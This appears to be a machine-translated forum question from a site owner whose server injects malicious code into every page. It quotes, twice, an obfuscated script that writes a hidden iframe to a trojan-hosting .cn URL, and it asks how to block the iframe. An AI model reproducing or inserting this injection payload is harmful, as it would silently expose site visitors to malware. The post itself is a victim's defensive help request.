私のウェブサイトが掲載されているサーバーにもウイルスがあります。
ウイルスが悪意のあるコードを挿入します
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
提供されるすべての単一ページに、ファイルの最後に追加するためにApacheまたは同様のものによって前処理されています。
次のコードを使用してテストファイルを作成しました。
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
それはきれいではありませんが、それはその目的を果たしました。
ブラウザでページを表示すると、
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
これはwww.sagamountain.com/testfile.htmlから表示できます(警告、このページは感染しています)
トロイの木馬が存在するサイトへのiframeであるため、プログラムでそのdivとそのスクリプトの実行を停止する必要があります。HTML、CSS、またはJSの場合、そのJSが実行されないようにする方法が必要です。
すでにdisplay:noneになっているので表示できませんが、iframeがまったく読み込まれないようにするにはどうすればよいですか?
助けてくれてありがとう!エスケープされていないものは、明らかに私の問題の原因であるhttp://ncccnnnc.cn/img/index.phpへのiframeに解決されます。そのサイトに行かないでください!